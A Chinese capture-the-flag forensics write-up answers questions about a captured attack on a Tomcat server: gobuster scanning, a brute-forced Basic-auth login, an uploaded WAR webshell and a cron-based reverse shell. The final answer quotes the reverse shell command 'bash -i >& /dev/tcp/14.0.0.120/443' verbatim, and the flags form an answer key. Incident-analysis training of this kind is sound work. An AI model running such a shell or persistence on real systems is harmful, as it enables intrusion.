1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}
分析流量包,发现请求包都是14.0.0.120 发起的
flag{14.0.0.120}
2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
通过地址查询工具,发现定位在广东广州,flag{Guangzhou}
3、哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}
分析流量分析开启的8080端口,flag{8080}
4、经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}
分析扫描阶段的流量包,发现gobuster工具头,故答案为flag{gobuster}
5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}
但是tomcat有个很经典的getshell,rce应该很多人都打过吧,开局就是弱口令,但是他的登录方式不是post请求,而是对用户名和密码组合并base64加密,并放置于Authorization处。
解密后得到 flag{tomcat-s3cret}
6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:flag{114514.txt}
分析post上传的war包异常,分析后在你们发现反弹shell操作。
故flag为war包,flag{JXQOZY.war}
7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息
观察反弹后的tcp流量:
根据提示我们可以知道计划任务里面/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’ 为flag
即flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}